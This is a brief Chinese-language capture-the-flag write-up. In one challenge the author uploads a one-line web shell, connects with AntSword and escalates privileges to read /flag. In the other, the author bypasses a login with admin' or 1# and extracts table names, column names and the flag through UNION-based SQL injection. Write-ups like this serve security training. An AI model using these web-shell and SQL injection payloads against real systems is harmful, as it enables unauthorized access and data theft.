ezupload
上传一句话,蚁剑直连,bash直接cat /flag,说没权限折腾了下Linux提权,大马提权。
payload:
cd /
cat /readflag
: (
简单的招聘系统
payload admin' or 1#
进入admin,成功访问招聘界面blank page界面
key处存在sql注入
有5个字段,显位在2
可以猜测后端查询语句可能类似:
select * from user where id='$id'
;
所以接下来的注入语句
1'union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3,4,5#
1'union select 1,(select group_concat(column_name) from information_schema.columns where table_name='flag'),3,4,5#
1'union select 1,(select flaaag from flag),3,4,5#